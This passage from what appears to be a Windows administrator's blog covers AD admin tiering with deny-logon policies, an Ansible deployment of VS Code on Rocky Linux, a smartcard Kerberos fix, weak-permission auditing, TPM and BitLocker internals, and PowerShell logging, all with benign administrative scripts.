    Tier 0 - Domain Admins, CAs, plus any management service running agents on the DCs.
    Tier 1 - Member Servers.
    Tier 2 - Workstations.

    Segregation is achieved with the use of User Rights Assignments (URA) via Group Policy, additional admin accounts and AD groups. The initial concept is easy: don't allow any account access across the boundaries between Workstation, Server or DC. Workstation admin accounts are prevented from logging on to servers and DCs. Server admins or server service accounts are unable to log on to a workstation or DC. Domain Admins never log on to anything but DCs.

    The theory sounds easy until management agents are installed on DCs. There's the potential for the SCOM or SCCM\MECM admin to fall victim to an attack; the attacker is granted System on the DCs via the agent, despite the admin not being a Domain Admin. I recommend not installing management agents on DCs or CAs. One solution, as this is the real world, is to install the management applications with an installer account and delegate privileges to the relevant groups and tiers, making sure not to cross the streams. Or create an additional tier for management servers with agents deployed to DCs.

    The downside of tiers is extra accounts. If you're the DA, then 3, possibly 4, admin accounts per domain are required. There's no perfect solution or one size fits all; aim to separate the tiers but allow for flex in the solution.
The only hard and fast rule is 'never allow any server admin or DA to log in to workstations.' Before starting, Domain Administrator privileges are required. First create the AD Groups for denying Domain Controller, Server and Workstation logon. Open 'AD Users and Computers' and create the following AD Groups: RA_Domain Controller_DenyLogon RA_Server_DenyLogon RA_Workstation_DenyLogon Create the following accounts: tenaka_wnp (workstation administrator) tenaka_snp (server administrator) tenaka_dnp (domain admin) Going to assume you're happy creating Restricted Groups in Group Policy and assigning them to OUs. Create the following AD Groups, assigning them to the relevant OU. PR_Workstation_Admins PR_Server_Admins Add tenaka_wnp to PR_Workstation_Admins Add tenaka_snp to PR_Server_Admins Add tenaka_dnp directly to Domain Admins, don't nest groups within Domain Admins. RA_ designates User Rights Assignment. PR_ designates PRivileged account. This is part of a naming convention used within this Domain. Open the RA_Workstation_DenyLogon group. Add Domain Admins, all server service accounts and PR_Server_Admins. Create a new GPO for the Workstations OU. Update the following User Rights Assignments with RA_Workstation_DenyLogon. Deny log on as a batch job Deny log on as a service Deny log on locally Deny log on through Remote Desktop Services Open the RA_Server_DenyLogon group. Add Domain Admins, PR_Workstation_Admins and service accounts not deployed to a server. Svc_scom_mon_ADMP performs synthetic transactions testing the performance of internal websites and DNS lookups. Create a new GPO for the Servers OU. Update the following User Rights Assignments with RA_Server_DenyLogon. Deny log on as a batch job Deny log on as a service Deny log on locally Deny log on through Remote Desktop Services Open the RA_Domain Controller_DenyLogon group. Add PR_Workstation_Admins, PR_Server_Admins and service accounts not used on DCs. Create a new GPO for the Domain Controllers container.
Update the following User Rights Assignments with RA_Domain Controller_DenyLogon. Deny log on as a batch job Deny log on as a service Deny log on locally Deny log on through Remote Desktop Services Run gpupdate /force on a workstation, server and domain controller to apply the changes; a restart may be necessary. All that remains is testing. Attempt to log on to a workstation with tenaka_wnp, tenaka_snp and tenaka_dnp; the only account that will successfully log on is tenaka_wnp. Attempt to log on to a server with tenaka_wnp, tenaka_snp and tenaka_dnp; the only account that will successfully log on is tenaka_snp. Attempt to log on to a Domain Controller with tenaka_wnp, tenaka_snp and tenaka_dnp; the only account that will successfully log on is tenaka_dnp.
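The group creation and membership steps above can also be scripted. A minimal sketch, assuming the ActiveDirectory module and a hypothetical OU path for the groups (adjust the DN to your own structure):

```powershell
Import-Module ActiveDirectory

# Hypothetical OU to hold the URA deny-logon groups - adjust to suit
$ouPath = "OU=Groups,OU=Org,DC=sh,DC=loc"

# Create the three deny-logon groups referenced by the User Rights Assignments
'RA_Domain Controller_DenyLogon',
'RA_Server_DenyLogon',
'RA_Workstation_DenyLogon' | ForEach-Object {
    New-ADGroup -Name $_ -GroupScope DomainLocal -Path $ouPath
}

# Populate the workstation deny group: Domain Admins plus the server admins group
Add-ADGroupMember -Identity 'RA_Workstation_DenyLogon' `
    -Members 'Domain Admins','PR_Server_Admins'
```

The GPO User Rights Assignments themselves still need to be set in the Group Policy editor as described above.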

  • When a Microsoft Engineer Meets Open Source: Deploying VS Code on Rocky Linux with Ansible.

As a Microsoft engineer, deploying Visual Studio Code on Rocky Linux using Ansible highlights the intersection of enterprise-grade tools and open-source flexibility. While much of my experience revolves around the Microsoft ecosystem, there's a certain satisfaction in utilizing the power of YAML and automation to streamline deployment processes. Ansible, a robust open-source automation tool, allows engineers to efficiently manage configurations, resolve dependencies, and ensure consistent deployments. This guide outlines the steps and considerations for deploying Visual Studio Code on a Rocky Linux system using Ansible, demonstrating how to combine open-source tools with Microsoft's developer resources for maximum efficiency. So why Rocky Linux? Why Ansible? Because, in the spirit of open source, we go where the community goes. And because, as much as I love PowerShell, sometimes you just want to let Linux do its thing. Let's dive in and show the world that even a Microsoft engineer can deploy Microsoft software with an open-source tool on a Linux distro. Spoiler alert: It's actually kind of awesome. Prerequisite Steps Before diving into Ansible, we set up three Rocky Linux virtual machines, each configured with 2 CPUs and 4GB of RAM. Rocky Linux Nodes rocky01 = 192.168.0.28 - Ansible Controller rocky02 = 192.168.0.38 - Dev Node 01 rocky03 = 192.168.0.39 - Dev Node 02 Create an Admin User During the setup, each node was configured with a user account named 'user' that has administrator privileges. If root was used instead, create an account with the following configuration: sudo adduser user sudo passwd user sudo usermod -aG wheel user Install SSH on Dev Nodes (02-03) SSH to each of the Dev nodes ssh user@192.168.0.38 ssh user@192.168.0.39 Install openssh-server sudo dnf install openssh-server Create a Public/Private Key on the Ansible Controller Generate an SSH key using the user account.
ssh-keygen -t ed25519 -C "ansible controller" Either provide a file name or use the default option. If you choose to specify a file name, ensure you include the full path. For best practice, enter a password. However, pressing Enter without typing anything will leave the password blank. ssh-keygen: This is the command used to generate, manage, and convert SSH keys. -t ed25519: Specifies the type of key to create. ed25519 is an elliptic-curve signature algorithm that provides high security with relatively short keys. It is preferred for its performance and security over older algorithms like rsa or dsa. -C "ansible controller": Adds a comment to the key. This comment helps identify the key later, especially when managing multiple keys. In this case, the comment is "ansible controller", which indicates that the key will be used for an Ansible control node. List the contents of the .ssh directory. The .pub file contains the public key, which is to be shared with other nodes. ls -la .ssh Copy the Public Key to the Dev Nodes Use the ssh-copy-id command to copy the public SSH key to the Dev nodes, enabling passwordless authentication. This command appends the public key to the ~/.ssh/authorized_keys file on the target node, ensuring secure access. This process requires the target node's password for the first connection. Afterward, the SSH key allows secure, passwordless logins. ssh-copy-id -i ~/.ssh/id_ed25519.pub user@192.168.0.38 ssh-copy-id -i ~/.ssh/id_ed25519.pub user@192.168.0.39 Test the connection to each Dev node. ssh -i ~/.ssh/id_ed25519 user@192.168.0.38 ssh -i ~/.ssh/id_ed25519 user@192.168.0.39 Install Ansible on the Controller Node Set up Ansible on the Ansible Controller node by executing the following commands: sudo dnf update sudo dnf install epel-release sudo dnf install ansible Copy Playbook from Github Clone the GitHub repository and move it to /home/user/ansible-vsc.
git clone https://github.com/Tenaka/ansible_linux_vcs.git mkdir ansible-vsc mv ansible_linux_vcs/* ~/ansible-vsc cd ansible-vsc Keep in mind that ~ refers to the home directory in Linux. tree A Quick Review of the Playbook Some amendments to the inventory.txt file are probably needed, so I'm using nano as the text editor and steering clear of vi—there's only so much this MS Engineer is willing to embrace. Ansible.cfg defines the settings for this ansible playbook: inventory = Specifies the inventory file (inventory.txt) that contains the list of hosts Ansible will manage. private_key_file = Indicates the path to the private SSH key (~/.ssh/id_ed25519) used for authenticating to remote hosts. ~/ansible-vsc/ansible.cfg [defaults] inventory = inventory.txt private_key_file = ~/.ssh/id_ed25519 ~/ansible-vsc/inventory.txt [all] 192.168.0.28 192.168.0.38 192.168.0.39 [visualstudio] 192.168.0.38 192.168.0.39 ~/ansible-vsc/visualcode.yml --- - hosts: all become: true roles: - baseline - hosts: visualstudio become: true roles: - visualstudio ~/ansible-vsc/roles/visualstudio/tasks/main.yml - name: Add Microsoft GPG key rpm_key: state: present key: https://packages.microsoft.com/keys/microsoft.asc - name: Add Visual Studio Code repository yum_repository: name: vscode description: "Visual Studio Code" baseurl: https://packages.microsoft.com/yumrepos/vscode enabled: yes gpgcheck: yes gpgkey: https://packages.microsoft.com/keys/microsoft.asc - name: Install Visual Studio Code yum: name: code state: latest # Don't run as root and install extensions - name: Install desired VS Code extensions become: false shell: "code --install-extension {{ item }} --force" loop: - redhat.ansible - redhat.vscode-yaml register: vscode_extensions changed_when: "'already installed' not in vscode_extensions.stdout" - name: Display installed extensions debug: msg: "Installed extensions: {{ vscode_extensions.results | map(attribute='item') | list }}" While VSC is installed using sudo, installing extensions
with elevated privileges does cause issues. Therefore, become is set to false. Deployment of Visual Studio Code Make sure to run the playbook from the ~/ansible-vsc directory. The command ansible-playbook --ask-become-pass visualcode.yml runs the Ansible playbook visualcode.yml with the following options: --ask-become-pass: Prompts you to enter a password for elevated (sudo) privileges on the target hosts. visualcode.yml: Specifies the playbook file to be executed. ansible-playbook --ask-become-pass visualcode.yml Enter the password at the prompt and sit back whilst Ansible does all the work. In the Ansible playbook output, 192.168.0.38 had previously been successful in deploying VSC during testing: changed: Indicates that a task made modifications to the target system. ok: This means that the task has successfully completed without making any changes. This often happens when the system is already in the desired state, such as when a package is already installed or a configuration file is already correct. Of course, these Linux boxes have a GUI installed—I'm an MS Engineer, and it's required for VSC. So log in to each of the Dev nodes and launch VSC. After rolling up my sleeves and diving headfirst into the untamed wilderness of Linux, this Microsoft engineer emerged with calloused hands and a newfound love for Ansible. Sure, there were battles with YAML (was that 3 or 4 spaces?), but every "PLAY RECAP: SUCCESS" felt like a badge of honor. And while I still instinctively reach for the Reboot button at every minor annoyance, I now pause a second or two to consider if the reboot is the correct course of action. Of course it is, it's the only action that works.

  • Windows 11 24H2 Smartcard and Accessing File Share Issues with EventID 40960

EventID 40960 LSA (LsaSrv) The Security System detected an authentication error for the server cifs/DomainController. The failure code from authentication protocol NTLM was "The authentication failed since NTLM was blocked (0xc0000418)". After upgrading a domain client from Windows 11 23H2 to 24H2, I encountered an issue logging in with a smartcard. The login itself completes successfully, but once you're in, none of the domain mapped file shares are accessible. Instead, you're repeatedly prompted for the smartcard PIN, and authentication continues to fail. Interestingly, logging in with a regular username and password works without any problems—domain shares connect as expected and everything functions normally. The error recorded in the Security event log points to a failure in CIFS (SMB) authentication, specifically due to NTLM being blocked or unavailable. The environment is a Windows Server 2019 domain where NTLM is still permitted as a fallback when Kerberos fails. The clients and servers are a mix of Windows 11, Server 2019, and Server 2022. Users currently have the option to log in using either their YubiKey smartcards or traditional passwords. However, the plan is to transition fully to smartcard PIN-based logins—eliminating password-based authentication entirely within the next month. After a little research, aka Google, and coming up empty, I didn't find a definitive answer—but I did come across a few mentions that pointed toward the Security Option "Network security: Configure encryption types allowed for Kerberos." I checked the setting, and sure enough, it was already configured globally to allow AES128_HMAC_SHA1 and AES256_HMAC_SHA1, so that didn't appear to be the root cause.
I'd love to say the fix was the result of some deep technical insight or a brilliant deduction, connecting all the dots. This was a shot-in-the-dark, coffee-fueled "I've seen enough weird Windows behavior to get a sense of déjà vu" moment. No documentation. No forum thread or Google results. And I hadn't planned on doing anything more complex than turning on the Xbox and zoning out for a bit. I definitely wasn't in the mood to wade through GPO settings or start faffing with klist and whatever other diagnostics I'd normally drag out for this kind of thing. So instead, I just opened up my user account settings, ticked the two checkboxes for "Kerberos AES encryption," sighed, and hit OK—fully expecting nothing. And naturally… it worked. I logged in with a smartcard and PIN, all the mapped network drives were present and accessible, then repeated the exercise with other accounts that had failed. The system was back and behaving itself. I really ought to thank Microsoft for their newfound consistency—consistently giving me fresh new material to blog about. It's almost heartwarming, really. Takes me right back to the glory days of Windows NT 4, when every new Service Pack was less of an update and more of a creative new way to keep me gainfully employed.
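Ticking those two "Kerberos AES encryption" checkboxes simply sets the account's msDS-SupportedEncryptionTypes attribute, so the same fix can be scripted for the other affected accounts. A sketch, assuming the ActiveDirectory module and a hypothetical username:

```powershell
Import-Module ActiveDirectory

# Hypothetical affected account - the checkbox fix, scripted:
# enables AES128 and AES256 Kerberos encryption types on the account
Set-ADUser -Identity 'jbloggs' -KerberosEncryptionType AES128,AES256

# Confirm the change took effect
Get-ADUser -Identity 'jbloggs' -Properties KerberosEncryptionType |
    Select-Object Name, KerberosEncryptionType
```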

  • Securing Weak File, Folder and Registry Hive Permissions.

In this blog, we'll examine how threat actors—often referred to as hackers—can escalate privileges when weak file, directory, or registry permissions are present. Many programs disable directory inheritance or assign excessive permissions to user accounts, leading to vulnerabilities. Finding these misconfigurations can be challenging, as it involves reviewing extensive file, directory, and registry hive permissions that are often overlooked. Fortunately, I have a few scripts that help detect and report these vulnerabilities and can also reset permissions to their secure defaults. But first, let's dive into the problem at hand... The Risks Improperly configured permissions for files, directories, and registry entries often create significant vulnerabilities that threat actors can exploit to escalate privileges or break out of restricted environments. When permissions are inadequately set, threat actors can gain access to or modify sensitive files, ultimately providing a pathway for unauthorized actions. Weak permissions enable unauthorized users to write and execute programs in specific directories or modify registry application paths, allowing them to redirect these paths to malicious locations. This redirection enables threat actors to inject and run their own code, giving them access to sensitive information or control over existing applications and files. Beyond simply executing programs, insecure directory permissions also allow unauthorized modification of file permissions. This level of access can be used to alter or delete important files or to introduce new files containing harmful code. Finally, these weak permissions open doors for attackers to leverage vulnerabilities within the operating system or its applications, allowing further access to the system. Additionally, unquoted paths and services with insufficient security configurations provide additional avenues for exploitation, allowing attackers to execute unauthorized commands and compromise system integrity. What to do.... Manually validating permissions across the operating system can be a slow and tedious process. After discovering some critical permission issues and recognizing the importance of thorough validation, I began developing a script for automated validation and pentesting. This script is available for download on GitHub, with all relevant links provided at the bottom of the page. The Scripts The Security Report Support Page Fix for Weak Permissions Fix Unquoted Paths
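To illustrate the kind of check involved (this is a minimal sketch, not the full script linked above), the following flags directories under Program Files where low-privileged groups hold write-class rights:

```powershell
# Minimal illustration: report weak ACEs on directories under Program Files
$weakRights = 'Write|Modify|FullControl'
$lowPriv    = 'Everyone|Authenticated Users|BUILTIN\\Users'

Get-ChildItem 'C:\Program Files' -Directory -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        $acl = Get-Acl -Path $_.FullName
        foreach ($ace in $acl.Access) {
            # Flag Allow entries granting write-class rights to low-privileged principals
            if ($ace.AccessControlType -eq 'Allow' -and
                $ace.IdentityReference -match $lowPriv -and
                $ace.FileSystemRights -match $weakRights) {
                "{0} : {1} has {2}" -f $_.FullName, $ace.IdentityReference, $ace.FileSystemRights
            }
        }
    }
```

Any path reported here is a candidate for the permission reset covered by the fix scripts.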

  • Understanding Windows 11, TPMs, PCRs, Secure Boot, Bitlocker and Where They Fail

Understanding Windows 11, TPMs, PCRs, and Security Features Windows 11 requires Trusted Platform Module (TPM) 2.0 as part of its foundation for enhanced security, alongside features like Secure Boot, BitLocker, and Virtualization-Based Security (VBS). With these tools, Microsoft aims to shield devices from evolving threats in an increasingly hostile digital landscape. This article takes a closer look at these features and highlights their limitations, particularly in the context of remote attacks. Trusted Platform Module (TPM): The Basics A Trusted Platform Module (TPM) is a specialized chip designed to enhance security by providing cryptographic operations, safeguarding sensitive data, and ensuring system integrity. It can: Generate, store, and manage cryptographic keys. Validate the integrity of the boot process using Platform Configuration Registers (PCRs). Support security features like BitLocker and VBS. Types of TPM Discrete TPM: A dedicated hardware chip soldered to the motherboard. Firmware TPM (fTPM): Built into the CPU and implemented via firmware. Checking TPM Status Windows Security App: Go to Settings > Privacy & Security > Windows Security, then navigate to Device Security > Security Processor. TPM Management Console: Open the Run dialog, type tpm.msc, and press Enter to check the status and specification version. Command Line: Run tpmtool getdeviceinformation to retrieve detailed TPM data: TPM Version: The specification version of the TPM (e.g., 2.0). Manufacturer Information: The manufacturer ID and version of the TPM chip. Supported Algorithms: Lists cryptographic algorithms supported by the TPM (e.g., RSA, SHA-256, etc.). PCR Banks: The hash algorithms used for Platform Configuration Registers (PCRs), such as SHA-1 or SHA-256. PCR Information: Indicates which PCRs are active and their supported configurations. TPM Status: The current operational state of the TPM, such as whether it's enabled, activated, or ready for use.
PowerShell Cmdlets: Get-Tpm: Displays TPM status and version. Platform Configuration Registers (PCRs): Ensuring Boot Integrity PCRs in the TPM store hashed measurements of the system state during boot, providing a cryptographic log of boot-time events. Uses of PCRs Secure Boot: Validates the bootloader, ensuring only trusted code is executed. BitLocker: Uses PCR values to confirm system integrity. Mismatched values (e.g., from tampering) trigger recovery mode. Commonly Used PCRs PCR 0: Measurements from the BIOS, firmware, and Core Root of Trust for Measurement (CRTM). PCR 2: Measurements of pluggable executable code, such as option ROMs. PCR 4: Tracks bootloader integrity. PCR 7: Represents Secure Boot configuration. What is Secure Boot? Secure Boot is a UEFI feature that ensures only signed and trusted bootloaders are executed during system startup. The TPM strengthens this process by securely measuring and storing key boot components' hashes in its Platform Configuration Registers (PCRs). These measurements create a tamper-proof record of the boot sequence. How Secure Boot Works: Digital Signatures: Each component in the boot chain (e.g., firmware, bootloader) must have a valid digital signature. Key Hierarchies: Platform Key (PK): Authorizes changes to Secure Boot settings. Key Exchange Key (KEK): Manages authorized signatures. Allowed and Forbidden Lists: Specify trusted and untrusted binaries. Secure Boot and PCRs: PCR 7 reflects the Secure Boot state. Tampering with Secure Boot settings results in a different PCR value. Checking Secure Boot Status: Open the System Information tool (msinfo32). Look for Secure Boot State in the report. What is BitLocker? BitLocker is a full-disk encryption feature that leverages TPM to secure data. It ensures that data remains inaccessible if the system is tampered with or the drive is removed. How BitLocker Uses TPM: Stores encryption keys securely in TPM.
Validates PCR values during boot. If the values match the expected measurements, the drive is unlocked. Configuring BitLocker: Open Explorer and navigate to C:. Right-click on C: and select 'Manage BitLocker'. Turn on BitLocker and follow the prompts. What is Virtualization-Based Security (VBS) and HVCI? Virtualization-Based Security (VBS) uses hardware virtualization to create isolated memory regions for security-critical operations, enhancing system security. VBS Features: Hypervisor-Enforced Code Integrity (HVCI): Ensures only signed and verified drivers and binaries are executed. Relies on TPM for key storage and Secure Boot for integrity validation. Credential Guard: Protects domain user credentials by isolating LSASS (Local Security Authority Subsystem Service) processes. Enabling VBS: Check hardware support: Virtualization support in BIOS/UEFI. Run msinfo32 and look for "Hyper-V Requirements." Enable VBS: Open Windows Security > Device Security > Core Isolation. Enable Memory Integrity. Verifying VBS Status: Run msinfo32. Look for Virtualization-Based Security in the report. What These Features Don't Protect While these tools provide strong defenses against physical tampering, they fall short against remote threats: Credential Theft - VBS's Credential Guard protects domain credentials but doesn't secure local account credentials, which can be dumped from memory. Additionally, techniques like pass-the-hash allow attackers to use stolen hashes without decryption. Application Exploits - TPM protections don't block malware that exploits software vulnerabilities. Attackers can bypass these defenses by targeting unpatched applications. Hardware-Level Attacks - Physical attacks on the Low Pin Count (LPC) bus could extract BitLocker keys if no PIN is used. Network-Based Attacks - Features like Secure Boot and TPM don't address phishing, network infiltration, or lateral movement.
Building a Comprehensive Security Strategy To address these gaps, organizations should bolster TPM-based features with additional measures: Application Control - Tools like Windows Defender Application Control (WDAC) enforce strict policies, blocking unauthorized applications and malware. Regular Patching - Keeping systems and applications up-to-date mitigates risks from known vulnerabilities. Multifactor Authentication (MFA) - Adds a layer of protection against credential theft and unauthorized access. Endpoint Detection and Response (EDR) - Monitors for suspicious activity and stops advanced attacks. The Takeaway Windows 11’s TPM-centric security features excel at defending against physical attacks, but they can’t stop remote exploits, credential theft, or network-based threats on their own. Think of them as a sturdy lock—effective at preventing break-ins, but not enough if attackers exploit the open Window. A layered security approach is essential to stay ahead of sophisticated threats.
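The individual status checks described above (Get-Tpm, msinfo32, the BitLocker control panel) can be rolled into one quick PowerShell pass. A sketch; run from an elevated prompt, and note that cmdlet availability varies by Windows edition:

```powershell
# Quick status pass over the features discussed above

# TPM present, ready, and manufacturer details
Get-Tpm | Select-Object TpmPresent, TpmReady, ManufacturerVersion

# Secure Boot enabled? (throws on legacy BIOS systems, hence the try/catch)
try { Confirm-SecureBootUEFI } catch { 'Secure Boot not supported on this platform' }

# BitLocker state of the OS volume
Get-BitLockerVolume -MountPoint 'C:' |
    Select-Object VolumeStatus, EncryptionMethod, KeyProtector

# VBS / HVCI state from the Device Guard WMI class
Get-CimInstance -ClassName Win32_DeviceGuard `
    -Namespace root\Microsoft\Windows\DeviceGuard |
    Select-Object SecurityServicesRunning, VirtualizationBasedSecurityStatus
```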

  • Bitlocker a Closer Look

In my previous blog, I explored how Microsoft leverages the Trusted Platform Module (TPM) to secure Windows 11. In this article, we're going to take a deeper dive into BitLocker. What is BitLocker? BitLocker is a full disk encryption feature integrated into Microsoft Windows, designed to safeguard the integrity and confidentiality of data. By encrypting the system drive, BitLocker ensures that unauthorized users cannot access sensitive information, even if they gain physical access to the hardware. A core part of BitLocker's security lies in the use of the Trusted Platform Module (TPM), which securely stores cryptographic keys needed to decrypt the data. Key Concepts in BitLocker Encryption Before diving into the workings of the private key and AES or XTS-AES, let's briefly define some of the key components involved in BitLocker's encryption process: Full Volume Encryption Key (FVEK): The FVEK is the primary encryption key used by BitLocker to encrypt and decrypt the entire volume (the disk or partition). It is a symmetric key, meaning the same key is used for both encryption and decryption. This key is essential for protecting the actual data stored on the drive. Trusted Platform Module (TPM): The TPM is a hardware chip embedded in most modern computers that provides secure storage for cryptographic keys and ensures that the system's boot process has not been tampered with. It is used in conjunction with BitLocker to protect the FVEK and to prevent unauthorized access to encrypted data. Password/PIN: A password or PIN is an optional but highly recommended security measure that adds an extra layer of authentication for unlocking the encrypted drive. This PIN/password is needed in addition to the TPM's cryptographic keys to unlock the system during boot.
Adding a PIN/password mitigates the Low Pin Count (LPC) bus attack. Recovery Key: If the TPM or PIN is unavailable (for example, if the hardware is replaced), BitLocker provides a recovery key, which is a 48-digit numeric key. This recovery key is essential for unlocking the encrypted drive in such cases. How BitLocker's Private Key Works The concept of a private key in BitLocker differs from that of traditional asymmetric encryption, where two keys (a private key and a public key) are used. BitLocker uses symmetric encryption for disk encryption, meaning it uses a single key (the Full Volume Encryption Key) for both encryption and decryption. However, BitLocker's security is strengthened by using the TPM and other factors (such as a PIN or password) to protect access to the Full Volume Encryption Key (FVEK). The private key in this context is tied to the TPM and is crucial for managing access to the FVEK. Here's how it all works in detail: Generation of the Full Volume Encryption Key (FVEK) When BitLocker is first enabled on a system, the FVEK is generated. This key is used to encrypt the entire disk or volume. However, to protect this key, it cannot be stored on the disk in plain text. Instead, it is stored securely using the Trusted Platform Module (TPM). TPM and the Protection of the Private Key The TPM plays a central role in BitLocker's encryption system. It is a hardware-based security chip that is embedded in many modern systems to provide tamper-resistant storage for cryptographic keys. The TPM protects the FVEK by encrypting it with a TPM-specific key, known as the TPM's Storage Root Key (SRK). This key is unique to the TPM and cannot be extracted by unauthorized parties, even if the hard drive is removed from the system and connected to another computer. Here's how the process works: Encrypting the FVEK: When BitLocker is enabled, the FVEK is encrypted with the TPM's key (which is securely stored in the TPM chip itself).
Storing the Encrypted FVEK: The encrypted version of the FVEK is stored in the system’s memory and on the disk. However, it cannot be decrypted without the TPM and proper authentication (such as a PIN, password, or recovery key). Unlocking the Encrypted FVEK: Upon system startup, the TPM checks the system’s configuration, including the integrity of the BIOS, bootloader, and other critical boot components. If any changes are detected (for example, due to a malware attack or hardware change), the TPM will refuse to release the FVEK, thus preventing unauthorized access to the encrypted data. Releasing the FVEK: If the TPM verifies that the system configuration is unchanged and trusted, it will decrypt the FVEK and pass it to the system. This is the moment when the encryption key becomes available to decrypt the data on the disk. At this point, the system can proceed with loading the operating system and allowing the user to interact with their data. AES-256 vs. XTS-AES-256: The Encryption Methods BitLocker can use different encryption algorithms, and understanding the difference between AES-128, AES-256, XTS-AES-128 and XTS-AES-256 helps in understanding how BitLocker protects your data. In the context of this article AES-128 and XTS-AES-128 will be ignored. Both AES-256 and XTS-AES-256 are symmetric encryption algorithms, meaning they use the same key for both encryption and decryption, but they differ in how they operate and the level of protection they offer. AES-256 AES (Advanced Encryption Standard) is a widely-used encryption standard that provides strong encryption capabilities. The "256" in AES-256 refers to the length of the key used in the encryption process: 256 bits. AES-256 works by encrypting the data in fixed-size blocks (128 bits) using a key that is 256 bits long. While AES-256 is secure and resistant to brute-force attacks, the challenge with traditional AES encryption lies in the potential vulnerabilities in how it handles block ciphers. 
Specifically, in the case of full-disk encryption, AES-256 does not account for the fact that some patterns might emerge within the plaintext data as it's encrypted. This is where XTS-AES-256 comes in. XTS-AES-256 XTS-AES-256 (XEX-based tweaked-codebook mode with ciphertext stealing) is an enhanced version of AES-256 specifically designed for disk encryption. While it uses the same AES-256 algorithm, it introduces a second key and modifies the way the encryption is applied to improve security, especially against attacks on the underlying disk encryption. XTS-AES-256 employs tweaking as part of its encryption process. It uses a tweak value to change how each block is encrypted, preventing certain patterns or structures in the encrypted data from being exploited. This makes it significantly harder for attackers to perform certain types of cryptanalysis on the encrypted data, particularly in full-disk encryption scenarios. For BitLocker, XTS-AES-256 is the preferred encryption method because it is specifically designed for disk encryption and provides stronger protection in that context. Adding a PIN or Password In addition to the TPM's encryption of the FVEK, BitLocker can also be configured to require an additional authentication factor, such as a PIN or password. This adds another layer of security, ensuring that the FVEK is not released even if the TPM is bypassed. Here's how the process works when a PIN is added: PIN Encryption: The PIN is combined with the TPM's key to create a secure, trusted boot environment. This combination of the TPM's key and the user-supplied PIN ensures that the encrypted disk remains inaccessible without both the physical TPM key and the correct PIN. Decryption of the FVEK: The TPM will release the encrypted FVEK only if the correct PIN is entered at boot. Without the correct PIN, even if an attacker has physical access to the machine, they cannot decrypt the FVEK and thus cannot access the data on the drive.
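Putting these pieces together in PowerShell, enabling XTS-AES-256 with a TPM-and-PIN protector might look like the following sketch. It assumes an elevated prompt and that Group Policy ('Require additional authentication at startup') permits a startup PIN:

```powershell
# Sketch: enable BitLocker on C: with XTS-AES-256 and a TPM+PIN protector
$pin = Read-Host -AsSecureString -Prompt 'Enter a BitLocker PIN'

Enable-BitLocker -MountPoint 'C:' `
    -EncryptionMethod XtsAes256 `
    -TpmAndPinProtector -Pin $pin

# Add a recovery password protector and display the 48-digit recovery key
Add-BitLockerKeyProtector -MountPoint 'C:' -RecoveryPasswordProtector
(Get-BitLockerVolume -MountPoint 'C:').KeyProtector
```

Store the recovery key somewhere safe (USB drive, printout, Microsoft account or Active Directory) as described below.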
How the LPC Bus Can Compromise the TPM The LPC bus operates as a communication channel between the TPM chip and the Southbridge, and indirectly to the Northbridge or CPU. Since this bus was not originally designed with modern security threats in mind, it lacks encryption or robust protection mechanisms. Enhancing Security with a PIN To mitigate the risk of LPC bus attacks, BitLocker allows the use of a PIN as an additional authentication factor. Here's how it works: User Input Required: Before the decryption process begins, the user must enter a PIN. This adds an extra layer of security beyond the TPM's PCR-based integrity checks. Secure Key Unsealing: The TPM uses the correct PIN to unlock the private key. Without the PIN, the private key remains sealed, even if an attacker has access to the LPC bus. Protection Against Physical Attacks: Since the PIN is not transmitted over the LPC bus, it cannot be intercepted. This makes it effective against attacks that exploit the LPC bus to extract the private key. Recovery Key In case the TPM is unable to release the FVEK (for instance, if hardware is changed or the TPM's configuration is corrupted), BitLocker allows users to unlock the drive using a recovery key. This recovery key is typically a 48-digit numeric code that can be used to manually unlock the drive when other authentication methods fail. The recovery key can be stored in various ways: Saved to a USB drive. Printed out and stored in a secure location. Stored in a Microsoft account or Active Directory for enterprise users. If the TPM does not release the FVEK during boot, the system will prompt the user to enter the recovery key, allowing access to the encrypted disk. Conclusion BitLocker, when used with the TPM and XTS-AES-256 encryption, provides a highly secure solution for protecting data at rest.
The TPM ensures that the decryption key is securely stored and not easily extracted, while XTS-AES-256 strengthens full-disk encryption by mitigating attacks that exploit patterns in the encrypted data. Incorporating a PIN into the BitLocker setup, alongside the TPM and XTS-AES-256, adds a further layer of assurance for securing sensitive data against a wide range of potential threats.
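As a practical illustration, the combination recommended in this conclusion (XTS-AES-256 with a TPM+PIN protector and a recovery password fallback) can be enabled with the built-in BitLocker cmdlets. A minimal sketch, assuming an elevated prompt on a TPM-equipped machine; the C: mount point is a placeholder, and Group Policy may need to permit startup PINs first:

```powershell
# Prompt for the startup PIN as a SecureString rather than hard-coding it
$pin = Read-Host -Prompt "Enter BitLocker PIN" -AsSecureString

# Encrypt the volume with XTS-AES-256 and require TPM + PIN at boot
Enable-BitLocker -MountPoint "C:" -EncryptionMethod XtsAes256 -TpmAndPinProtector -Pin $pin

# Add a 48-digit recovery password as a fallback key protector
Add-BitLockerKeyProtector -MountPoint "C:" -RecoveryPasswordProtector
```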

  • PowerShell Logging and Not Start-Transcript

Introduction

While PowerShell's Start-Transcript command is a common choice for logging script output, it has its shortcomings: it records console output (Write-Host) without providing structured log levels, detailed formatting, or robust error tracking. Logging in PowerShell scripts is often overlooked (I know I often skip it for 'just a quick script'), yet it plays a crucial role in confirming what a script actually did. In this example the script moves family photos, and there is nothing more important on my computer than decades of pictures and videos; I can't afford for any to be deleted or lost, so logging is vitally important.

The script to organise files by Year and then by Month can be downloaded from ( here ).

Reminder Before You Begin

Before running this script on important files, make sure to test it first! While it worked during my testing and implementation, it's always best to double-check before making big changes.

Overview

This PowerShell script is designed to automate file organization within a specified directory. It performs two main functions:

Detecting and moving duplicate files, identified by their SHA256 hashes, to a duplicates folder.
Sorting the remaining files into subdirectories organized by year and month, based on their last modified date.

Additionally, the script implements detailed logging to track its execution, errors, and actions taken during the process.

Key Components of the Script

1. Parameters and Initialization

The script accepts two parameters:

$Data2SortPath: The main directory containing files to be organized.
$duplicatesPath: A subdirectory where duplicate files will be moved.

A log file is also created at the start with a timestamped filename:

$LogFile = "$($Data2SortPath)\OrganizeFilesLog_$(Get-Date -Format 'yyyyMMdd_HHmmss').log"

This ensures that each script run generates a new log file, preventing previous logs from being overwritten.

2. Logging Functionality

The script includes a custom logging function, Write-MoveLog, to standardize log messages:

function Write-MoveLog {
    param (
        [string]$Message,
        [string]$LogLevel = "INFO"
    )
    $Timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
    "$Timestamp [$LogLevel] $Message" | Out-File -FilePath $LogFile -Append
}

This function:

Formats logs with a timestamp.
